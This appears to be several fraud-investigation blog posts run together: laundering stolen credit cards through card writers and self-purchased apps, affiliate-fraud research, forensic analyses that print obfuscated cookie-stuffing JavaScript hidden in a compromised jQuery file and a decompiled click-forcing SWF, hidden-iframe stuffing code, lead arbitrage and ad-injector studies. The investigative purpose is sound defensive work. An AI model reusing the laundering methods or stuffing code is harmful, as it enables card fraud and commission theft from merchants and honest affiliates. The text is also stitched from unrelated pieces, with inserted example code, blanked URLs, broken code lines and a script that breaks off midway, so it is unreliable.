Fraudster on the roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.


I spend a lot of time thinking about the underground economy. What has always fascinated me is that the Web seems to provide a false sense of security to scammers, who think nothing of flaunting their illegal services in full view of authorities and anyone who cares to take a look. One site in particular is a surprising resource here. Point your browser to your favorite search engine and type in the following query:


The thousands of results returned include scammers selling everything from card data to bank logins, botnets, PayPal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

Market          Card type            Average price
United States   American Express     $7.00
United States   Discover             $8.00
United States   Visa & Mastercard    $4.50
Europe          American Express     $12.50
Europe          Discover             $18.00
Europe          Visa & Mastercard    $14.50
Asia            American Express     $18.00
Asia            Discover             $18.00
Asia            Visa & Mastercard    $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often one hears about ‘data breach here’ and ‘millions of accounts compromised there’, but how does this translate into scammers making money? I’m not talking about the scammers that sell the data card by card; I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could buy a whole bunch of items from an online market and then resell them. But where would one have the goods from the initial purchase delivered? An entry-level scammer may interrupt now and say that you don’t deliver them to yourself, because the goal is to launder the card as quickly as you can and make a clean getaway. One way to do this is to list items at a discount on online market A; once these sell, you buy the product through online market B with the stolen card and ship it to the buyer from market A. Easy.

It’s a simple scam, but scammers are lazy and this sounds like too much work, mostly in the sense that it takes so long to make it all happen. Money would only trickle in slowly, and by the time it starts producing any meaningful income the account on A could be closed at any moment (the buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (detection), but from what I have read it is surprisingly easy to get up to speed here, far easier than I thought it would be. A few searches on eBay for the model number of a card writer (“MSR605”) yield a list of auctions with card writers that are ready to roll for less than $150.

Note that the software provided with the writer facilitates pushing track 1/2/3 data onto an offline card. Track 1/2/3 is the credit card data for sale on the underground economy — it is stored on the magnetic stripe of your card.

credit card track 2 data

A scammer who is printing his/her own cards can then purchase fairly expensive and hard-to-track items from offline stores (jewelry), which can then be sold at a discounted rate online. Since the scammer paid nothing for the items, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, together with making sure to purchase only hard-to-track items, mitigates the risk of the scammer’s online sales account being reported and his efforts going to waste.

As mentioned earlier, there’s a fair amount more risk involved with this scam, in the sense of getting caught and going to jail. Obviously moving the scam offline means that the scammer has to participate in the physical world that is bound to the same laws of the people that he/she is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops whilst putting on a ruse for the scammer. A card could have been reported as stolen between purchasing the data and printing it to a card, prompting a call to the credit card company when swiping the card.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

scammer hustle and flow

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. Scammer will buy goods using a stolen credit card and sell them at a discounted price to a buyer through the market. Merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another perhaps a more strategic fraudster would present his thoughts on the weakest links in their ecosystem:

“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good ol’ wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest asset if we want to be successful in the future.”

He’d then present something similar to the following:

scammer hustle and flow 2

Now, it’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. So ultimately what the fraudster is saying is: why waste time with merchants and legitimate buyers when the enterprising fraudster can be both?

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Just think about it a little, fraudsters can sell something that cost next to nothing to build (basically it’s just the cost of cycles on their CPU to build an empty app) and the market will happily onboard yet another publisher in their ever increasing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.”

Affiliate programs vary dramatically in their incidence of fraud: in some merchants’ affiliate programs, rogue affiliates fill the ranks of high-earners.  Yet other similarly-sized merchants have little or no fraud.  Why the difference?

In Information and Incentives in Online Affiliate Marketing, Ben Edelman and I examine the impact of varying merchant management decisions.  Some merchants hire specialist outside advisors (“outsourced program managers” or OPMs) to set and enforce program rules.  Others ask affiliate network staff to make these decisions.  Still others handle these tasks internally.

A merchant’s choice of management structure has significant implications for both the information available to decision-makers and the incentives that motivate those decision-makers.  Outside advisors tend to have better information: An OPM sees problems and trends across its many clients.  A network is even better positioned – enjoying direct access to log files, custom reports, and problems reported by any merchant in the network.  That said, outside advisors usually suffer clear incentive problems: most notably, networks are usually paid in proportion to a merchant’s affiliate channel spending, so networks have a significant incentive to encourage merchants to accept even undesirable affiliates.  In contrast, merchants’ own staff typically have incentives more closely aligned with the merchant’s genuine objectives.  For example, many in-house affiliate managers have stock, options, or bonuses that depend on company profitability.  And working in a company builds intrinsic motivation and loyalty.  In short, there are some reasons to think outsourced specialists will yield superior results, but other reasons to favor in-house staff.

To separate these effects, we used crawlers to examine affiliate fraud at what we believe to be an unprecedented scope.  We automated more than 2 million page-loads on a variety of computers and virtual computers, examining the relative susceptibility of all CJ, LinkShare, and Google Affiliate Network merchants (as of spring 2012) to adware, cookie-stuffing, typosquatting, and loyalty apps.

We found outside advisors best able to find the “clear fraud” of adware and cookie-stuffing that are plainly prohibited by network rules.  But in-house staff do better at avoiding “grey area” practices such as typosquatting – schemes less plainly prohibited by network rules, yet still contrary to merchants’ interests.  On balance, there are good reasons to favor each approach – but a merchant choosing outsourced management should be sure to insist on borderline decisions always taken with the merchant’s interests at heart; and a merchant managing its programs in-house should be careful to avoid known cheaters a savvy specialist would more often exclude.

Incidental to our analysis of management structure, we also collected significant data about the scope of affiliate fraud more generally.  Some differences are stark: For example, Table 4 of the article reports Google Affiliate Network merchants suffering, on average, less than half as much adware and cookie-stuffing as LinkShare merchants.  Edelman has been critical of Google on many issues, but when it comes to affiliate quality, GAN was impressive.  GAN’s focus on affiliate quality comes through clearly in our large-sample data.

Our full analysis is under review by an academic journal.

The site ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up is going to result in a request which is then responsible for requesting The ASP file returns a list of URLs (affiliate clicks included), the Flash payload in the browser then invisibly requests each of the links and cookies returned in these lookups result in forced/faked affiliate clicks.

The question now is where the initial request comes from, i.e., what exactly is responsible for it? If you search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you do a dynamic search (via the DOM) you’re still not going to find it. Babyface, like many of the technical marvels among blackhats in this space, was not the brightest bulb on the ever-shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at the script file in question and you’ll find what looks to be a jQuery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires...

In compromising this site, he has hidden his activities in this jQuery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time
// the page loads on a javascript enabled browser
(function(){
  // Babyface is checking to see if a certain cookie has been set.
  // If it has not then the following code will be executed.
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks
  // by making it a sequence of characters, when you evaluate these
  // characters the name of the cookie comes out to "babyface"
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1){
    try{
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick
      // off the attack. The payload is delivered from character
      // sequence below which equals "" (the character codes of the
      // URL are not reproduced here)
      var p=String.fromCharCode(/* URL character codes omitted */)
        + "?i=" + (new Date()).valueOf();
      // the 1x1 object is written into the span and the span appended
      // to the page (these two statements are reconstructed; the
      // extraction dropped them)
      s.innerHTML=
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
      c.body.appendChild(s);
    }catch(e){}
  }
})();

So the JavaScript above answers our earlier question of what is responsible for the request. The SWF that is loaded as a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.display.*;
    import*;
    import*;
    import flash.system.*;
    public dynamic class MainTimeline extends MovieClip {
        public var loader:URLLoader;
        public var url:String;
        public var reqURL:URLRequest;
        public function MainTimeline(){
            addFrameScript(0, frame1);
        }
        function frame1(){
            url = "";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = NaN;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(;
            safe = new Number(["safe"]);
            url1 = new String(["url1"]);
            url2 = new String(["url2"]);
            url3 = new String(["url3"]);
            url4 = new String(["url4"]);
            url5 = new String(["url5"]);
            url6 = new String(["url6"]);
            url7 = new String(["url7"]);
            url8 = new String(["url8"]);
            url9 = new String(["url9"]);
            url10 = new String(["url10"]);
            url11 = new String(["url11"]);
            url12 = new String(["url12"]);
            url13 = new String(["url13"]);
            url14 = new String(["url14"]);
            url15 = new String(["url15"]);
            url16 = new String(["url16"]);
            url17 = new String(["url17"]);
            url18 = new String(["url18"]);
            url19 = new String(["url19"]);
            url20 = new String(["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                } catch(e:Error) {
                }
                // the twenty requests are then issued (remainder of the method not reproduced)
            }
        }
    }
}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

We’ve recently been watching an Amazon Associates fraudster taking remarkable efforts to cover his tracks.  Like many rogue Associates we’ve looked at, he’s stuffing cookies invisibly.  He’s using Flash-based stuffing, a technique first written up last year.  But he’s several notches more sophisticated than most:

The fraudster begins by buying a 125×125 IFRAME in the targeted site, here (much like the fraudster who targeted Venturebeat).

phonearena - affiliate fraud 1

But his Flash creates a doubly-invisible IFRAME — setting CSS visibility to “hidden” and also setting width and height to just 1 pixel each:

"function(fffff) {
  var xxxxx = document.createElement (\'iframe\'); = \'xxxxx\'; = \'xxxxx\'; = \'hidden\'; = \'1px\'; = \'1px\';
  var yyyyy = document.body;
  yyyyy.appendChild (xxxxx); ...

If you’re hoping to see the fraudster’s IFRAME with ordinary visual inspection, you’ll be disappointed: it’s doubly-invisible, as instructed by the preceding code.

Second, the fraudster uses JavaScript to remove the IFRAME that stuffs Amazon cookies, just ten seconds after the IFRAME loads:

xxxxx.onload = function() {
  setTimeout (function()
   {yyyyy.removeChild (xxxxx);}, 10000);
};
xxxxx.src = fffff; }", arg1);

Any investigator wanting to find the fraudster’s IFRAME by inspecting the page DOM would have just ten seconds to do so — usually not enough.

Third, this fraudster is rotating among many Amazon Associates IDs.  We found one several months ago, then thirteen more this month.  By using multiple accounts, the fraudster spreads his earnings, and no single account stands out as unreasonably large.  Using many company names is relatively standard among folks with something to hide – recall Direct Revenue’s dozens of company names.  (By using multiple names, companies seek to avoid the notoriety and additional scrutiny that could result from a single large identity.)  In contrast, any legitimate affiliate would want credit, recognition, and extra payment for its high traffic volume.  So spreading traffic across multiple IDs confirms that this fraudster knows he is breaking Amazon’s rules.

Relatedly, this fraudster carefully uses JavaScript to fake clicks such that HTTP Referers and other characteristics look legitimate when traffic reaches Amazon.  This method automatically causes HTTP Referer fields to take values consistent with the Associate IDs described above.  Here’s a sample of the code that fakes a click and causes HTTP Referers to flow accordingly:

var url="";
var xxx = document.createElement ("a");
if (typeof( == 'undefined')
{ location.href = url; }
else
{ xxx.href = url; document.body.appendChild(xxx);; }

Fourth, this fraudster is unusually cautious in how many users he stuffs.  In our testing, his ad stuffs only about one third of users.  Furthermore, he stuffs only on the first visit.  If your IP is not selected on the first visit, you will never be stuffed on any subsequent visit, no matter how many times you revisit.  He also limits his stuffing to certain geographies and with other restrictions we’ll save for another write-up.  Of course this caution comes at a cost — less stuffing relative to his media-buying costs — but the fraudster seems to find this profitable.  Specifically, this reduces his likelihood of detection — letting him continue at greater length.  Combining this caution with the fraudster’s use of Flash, double invisibility, and ten-second automatic removal from the DOM — and he’s unusually hard to catch.
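The ten-second window described above is the problem for anyone inspecting the DOM by hand. As an added example (not the original post's code), the monitor below records every IFRAME for its whole lifetime, however short, re-reads the src at removal (the stuffing code sets xxxxx.src only after appendChild), and classifies each frame on the four indicators from this write-up: CSS-hidden, 1px square, transient, affiliate-tagged URL. The affiliate-tag pattern and the example hosts are assumptions for illustration; the classifier is a pure function so it can be exercised outside a browser.

```javascript
// Monitor for transient, hidden cookie-stuffing IFRAMEs of the kind described
// above: CSS visibility hidden, 1px square, src assigned after insertion and
// removed from the DOM ten seconds later. Added example, not the original
// post's code. classifyFrame() is pure so it can be tested without a browser;
// the MutationObserver wiring at the bottom runs only when a DOM exists.

// Query parameters that mark an affiliate-tagged landing URL. An assumed
// pattern for this example (Associates tags end in a dash and two digits).
const AFFILIATE_MARKERS = [/[?&]tag=[^&]+-\d\d\b/i, /[?&]linkCode=/i];

// rec = { src, visibility, display, width, height, lifetimeMs }; lifetimeMs is
// null while the frame is still attached. Three or more indicators together
// flag a frame; hidden 1px frames that persist (login, tracking) do not.
function classifyFrame(rec) {
  const px = (v) => parseFloat(v); // '1px' -> 1
  const reasons = [];
  if (rec.visibility === 'hidden' || rec.display === 'none') reasons.push('css-hidden');
  if (px(rec.width) <= 1 && px(rec.height) <= 1) reasons.push('1px');
  if (rec.lifetimeMs !== null && rec.lifetimeMs <= 15000) reasons.push('transient');
  if (AFFILIATE_MARKERS.some((re) => re.test(rec.src || ''))) reasons.push('affiliate-url');
  return { src: rec.src || '', reasons, suspicious: reasons.length >= 3 };
}

// Every IFRAME in an added or removed subtree (the frame may be nested).
function framesIn(node) {
  if (node.nodeType !== 1) return [];
  return node.tagName === 'IFRAME' ? [node] : Array.from(node.querySelectorAll('iframe'));
}

// Record each IFRAME for its whole lifetime, however short. The src is read
// again at removal because the stuffing code sets xxxxx.src only after
// appendChild(), so it is still empty when the insertion is observed.
function watchFrames(doc, onRecord, now = Date.now) {
  const live = new Map();
  const observer = new MutationObserver((mutations) => {
    for (const m of mutations) {
      for (const added of m.addedNodes) for (const f of framesIn(added)) {
        const cs = doc.defaultView.getComputedStyle(f);
        live.set(f, { src: f.src, visibility: cs.visibility, display: cs.display,
                      width: cs.width, height: cs.height, addedAt: now() });
      }
      for (const removed of m.removedNodes) for (const f of framesIn(removed)) {
        const r = live.get(f);
        if (!r) continue;
        live.delete(f);
        onRecord(classifyFrame({ ...r, src: f.src || r.src, lifetimeMs: now() - r.addedAt }));
      }
    }
  });
  observer.observe(doc.documentElement, { childList: true, subtree: true });
  // Frames still attached can be reviewed at any time with lifetimeMs = null.
  const pending = () => Array.from(live.values()).map((r) => classifyFrame({ ...r, lifetimeMs: null }));
  return { observer, pending };
}

// Constructed records modelled on the write-up; hosts are placeholders.
const STUFFING_FRAME = {
  src: 'https://www.amazon.example/dp/B00PLACEHOLDER?tag=associd-20',
  visibility: 'hidden', display: 'block', width: '1px', height: '1px', lifetimeMs: 10000,
};
const VIDEO_EMBED = {
  src: 'https://player.video.example/embed/123',
  visibility: 'visible', display: 'block', width: '640px', height: '360px', lifetimeMs: null,
};

if (typeof document !== 'undefined') {
  watchFrames(document, (f) => { if (f.suspicious) console.warn('possible stuffing frame', f); });
} else {
  console.log(classifyFrame(STUFFING_FRAME), classifyFrame(VIDEO_EMBED));
}
```

Paste the block into the console of a page under investigation before the ad slot loads; the onRecord callback then fires when the frame is removed, which is exactly when manual inspection would have lost it.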

How much money is this fraudster making?  We don’t know for sure, and Amazon has no reason to say.  But the fraudster is buying display ad space on a popular site (Alexa ranking <1500).  That can’t be cheap, and he must anticipate earning more than enough to cover his costs.  As best we can tell, Amazon Associates is this fraudster’s entire business model, with no other networks being targeted — meaning that Amazon is paying the entire cost of this fraudster’s scheme.

Of course users see nothing — not even an extra popup or popunder.  Users do get a bit of bandwidth wasted by the extra page-load, but even folks on a mobile data plan probably wouldn’t notice.  The big loser is Amazon — paying affiliate fees, as much as 8%, to get traffic it otherwise would have received completely free.  We’re also struck by the losses to other affiliates: If another affiliate truly referred the user to Amazon, but this fraudster interceded to stuff its cookie, then the honest affiliate’s commission is stolen by this fraudster.

Here’s a sampling of the Amazon Associates IDs we’ve seen this fraudster using:


Full packet log of our first observation of this fraudster’s activities available here.

We call this fraudster Cellphonetech because his controlling server is cellphonetech dot net.  WHOIS indicates that the registrant is Lin Yong of Fujian China, email address

Cost Per Lead (CPL) is an advertising model where the advertiser pays for sign-ups from interested consumers. Affiliates play the middlemen in these transactions, since they send the interested consumers in the direction of the advertiser. So for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto the affiliates, advertisers are spared the hassle of everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser. Note the following:

  • Commission rate of “$2.65”/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates cannot encourage consumers to sign up with the advertiser by offering rewards such as cash or points in some program.

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):

Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in USA or Canada who will sign up using the link that has been provided. This is a packet trace of me following the link using my browser, the screenshot below shows the result.

This is what’s going on in the packet trace:

  1. Subscriber in the online forum decides he wants the $0.40 on offer in the online forum
  2. He/she starts the task by navigating to
  3. Tinyurl redirects to which then uses JavaScript and an HTML form to redirect the browser to (this essentially launders the referrer)
  4. sets up a full screen iframe which contains which redirects to the following affiliate click URL:;c=63867&a=105565&s1=tanks
  5. This URL redirects to which redirects to

So what you have here is an affiliate taking advantage of a price differentiation in two markets. Of course, one of these markets is of his own creation, but essentially this equates to arbitrage (pay $0.40 and sell $2.65) and a bad deal for Worldoftanks (the poor advertiser that bankrolls this operation).

Ad injectors insert ads into others’ sites, without permission from those sites and without payment to those sites. See example screenshots below showing injections into YouTube, Amazon, CNN, Dell, and eBay.


In this article, we review the basic operation of ad injectors, then examine the ad networks, exchanges, and other intermediaries that broker the placement of advertising through injectors.
We focus on advertisers and ad networks because their payments are the sole funding of most ad injectors. If advertisers and ad brokers universally rejected injector traffic as improper and unwanted, then injectors would have no reason to exist, no means to pay to get installed on users’ computers, and no reason to continue operation.

We also report which advertisers most often advertise through injectors. Whether through complexity, inattention, or indifference, these advertisers’ expenditures are ultimately the sole revenue source for injectors.

The Business of Ad Injection

To modify the appearance of targeted sites, injectors rely on software installed on users’ computers. Injectors largely target Windows users, though in many instances injectors modify Chrome and Firefox in addition to Internet Explorer. The restricted architecture of mobile devices and tablets currently largely protects those platforms from ad injectors.

We currently primarily see injectors becoming installed through bundles — often, including an injector when a user seeks entirely unrelated software. Typically, the inclusion of the injector is disclosed only midway through the installation process of software that is purportedly “free.” We struggle to reconcile mid-installation disclosure with the “outset of the offer” requirement in the FTC’s Guide Concerning Use of the Word “Free” and Similar Representations: The FTC instructs that if a “free” offer is contingent on other obligations, those obligations must be disclosed at the outset of the offer, not midway through.

A separate potential concern comes from installation disclosures that are less than forthright. For example, injector installation disclosures often state that ads may be displayed “when you browse the web.” This vague disclosure is at best unclear as to where ads will appear, giving consumers little warning that ads will in fact be inserted to appear within the sites users view. Consumers have little reason to suspect that installing a program can change the appearance of entirely unrelated web sites, and this vague disclosure, lacking in specifics and appearing midway through an installation process, fails to tell consumers what they are purportedly accepting.

While concern at injectors has grown over the past two years, injectors are actually longstanding. In 2001, adware pioneer Gator began distributing software that would seek standard-sized banner ads and cover them with Gator’s own ads. When the Internet Advertising Bureau criticized this practice, Gator filed suit — though Gator then abandoned banner replacement in favor of the popup ads for which Gator is more widely remembered. Meanwhile, other injectors continued where Gator had led. For example, in 2007 Edelman reported AT&T, Travelocity, and Vonage advertising through the Fullcontext ad injector. (As those screenshots show, Fullcontext placed banners, among other locations, into the top of– a location where no third-party ads are ordinarily available at any price.) More recently, Brandi reported ads injected into Google, Amazon, eBay, and Wikipedia, notwithstanding Wikipedia’s refusal to sell ads at all and the other sites’ refusal to sell ads in the place, size, and quantity that this injector caused.’s August 2013 screenshots add a dozen more examples.

Ad injection has proven lucrative. As of November 2011, court filings reveal that a single injector maker, Sambreel, enjoyed monthly revenue in excess of $8 million.  Sambreel incurred costs in paying partners to install its software on users’ computers. But Sambreel did not need to write articles, produce videos, or otherwise create original content — in sharp contrast to the publishers whose sites were targeted for injected ads from Sambreel.

Ad injectors raise weighty questions. Consumers are rightly concerned about installation methods and possible harms to privacy, computer reliability, and performance. Sites are concerned about users misattributing injectors’ banners: users would understandably blame web sites for excessive or inappropriate advertising. Sites also perceive unfairness when injectors place ads in content they did not create: Having prepared that content, sometimes at considerable expense, site operators are alarmed to see the fruits of their efforts flowing to others. We credit the importance of these questions but defer them to the future. Instead, we now turn to identifying the networks and other intermediaries that transfer funds from advertisers to ad injectors.

The Relationships Supporting Ad Injectors

In principle ad injectors could attempt to sell ad placements directly to advertisers. At the right price, some advertisers might be receptive. Injectors’ offerings would no doubt be more attractive because injectors offer placements in sites that otherwise refuse advertising (e.g. Wikipedia) and because injectors offer placements more prominent than sites otherwise offer (e.g. oversized ads above the fold on Direct sales would let injectors’ staff personally explain the placements they are offering, and advertisers could make informed, considered decisions.

Instead, in our testing, ad injectors sell through a web of networks, exchanges, and other intermediaries. On the most favorable view, these intermediaries improve efficiency: Specialist brokers know how to work with advertising buyers and have built systems to optimize ad placements by putting each ad in the locations where it performs best. But these intermediaries create additional complexity that tends to undermine accountability. For example, if traffic flows from an injector to intermediary A to B to C to D to an advertiser, the advertiser may never be told that it is actually buying injector traffic rather than (or in addition to) placements in genuine web sites. Meanwhile, even if some intermediary D figures out that C is sending injector traffic, and even if D refuses to accept that traffic, injection inventory may continue to reach D via other methods — perhaps A to B to E to D. So even diligent intermediaries can find themselves receiving and passing along injector traffic they do not want.

Our first example above, showing an AT&T ad injected into the top of, is unusually simple. Forensically, we found that the placement flowed from Sambreel’s Webcake injector to Sambreel’s Ztstatic and Amasvc servers, which passed an impression to AOL Then AOL returned the AT&T ad visible in the screenshot. We preserved a packet log of the network transmissions associated with this placement. Despite the simplicity, it is unlikely that AT&T knew it was receiving ads through adware or ad injectors. Indeed, touts “better inventory” including “74 of comScore’s top 100 sites” as the primary reason (top-listed reason on AOL’s site) to buy placements from An advertiser buying from has no reason to suspect that injections will be included.

The money trail – how funds flow from advertisers to the Peachfuzz injector.

In other instances, the placement chain can be significantly more complicated. For example, see the second example above, showing a Chevrolet ad injected into the top of YouTube. There, the Peachfuzz injector used an Akamai ad server to pass an injected impression to which returns Z5X tags passing the impression through the App Nexus marketplace. Next App Nexus returns DoubleClick tags with account code N4694.Beep346, yielding tags from Goodway Group, a digital marketing service provider. Finally, Goodway Group returns an ad for Chevrolet. See the diagram at left. This placement chain is typical of the injections we have examined.

In the subsequent sections, we run a similar analysis at large scale and using automation in order to inventory the responsible intermediaries, including intermediary chains that are significantly longer and more complex.


We installed a variety of ad injectors on test computers in our labs. We built an automated system to retrieve, analyze, and preserve injected ads from numerous computers around the world, and we monitored the resulting responses to determine the hosts that receive and pass along the resulting traffic. Our methodology allows us to observe all ad networks, ad exchanges, and other advertising intermediaries between an injection and the resulting advertisement. We transfer that data to a relational database for analysis, tabulation, and charting.

Our analysis includes all exchanges and networks that have the ability to prevent ads from being placed into injectors (even if these companies elect not to exercise this right). We attempt to omit passive tool providers with neither the right nor the ability to prevent ads from being served. For example, if a tool provider serves only to count impressions or clicks, that vendor would have little ability to prevent an injector from serving an ad. These exclusions are manual and inevitably imperfect — particularly for hosts that lack clear indication of their function and/or serve multiple functions.

For ease of interpretation, we label most frequently-observed hosts with company names in lieu of domain names.


In testing of September 5 to 12, 2013, we checked the advertisements loaded by three leading ad injectors. We checked each injector at least ten thousand times from a mix of fourteen locations in eight countries, in order to obtain a mix of ads. All testing occurred on virtual computers without prior browsing (hence without cookies inviting particular ad targeting or retargeting).

The tables and charts below present the intermediaries receiving traffic from the ad injectors we examined. In each table, the left column reports the intermediaries most often directly or indirectly receiving traffic from the specified ad injector. The third column summarizes the brokers most often passing the traffic from the injector to that intermediary: Some intermediaries disproportionately receive traffic directly from the injector, while other traffic tends to flow from injector to one or more brokers to the specified intermediary.
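As an added illustration (example code, not the authors’ crawler) of how observed ad-call chains become per-intermediary and per-advertiser tables of the kind that follow: the chains, names and the passive-tool list are constructed for the example, and the counting follows the conventions the text describes (passive tools excluded; ad calls, not impressions, counted).

```python
"""Turn observed ad-call chains into per-intermediary and per-advertiser tables.

Added example, not the authors' crawler. Each chain is one injected impression
followed hop by hop (injector -> broker -> ... -> advertiser), the kind of
record a packet log or HAR capture yields once each host is mapped to a company.
"""
from collections import Counter, defaultdict

# Constructed sample chains; the names are illustrative, not from the page's data.
CHAINS = [
    ["Injector X", "Exchange A", "Ad Server B", "Advertiser P"],
    ["Injector X", "Exchange A", "Ad Server B", "Advertiser Q"],
    ["Injector X", "Exchange A", "Pixel Counter", "Ad Server B", "Advertiser P"],
    ["Injector X", "Network C", "Exchange A", "Ad Server B", "Advertiser P"],
    ["Injector X", "Network C", "Ad Server B", "Advertiser R"],
    ["Injector X", "Exchange A", "Network C", "Exchange A", "Ad Server B", "Advertiser Q"],
]
# Passive tool providers only count impressions or clicks and cannot block an
# ad, so the text excludes them before attributing traffic.
PASSIVE_TOOLS = {"Pixel Counter"}


def strip_passive(chain, passive=PASSIVE_TOOLS):
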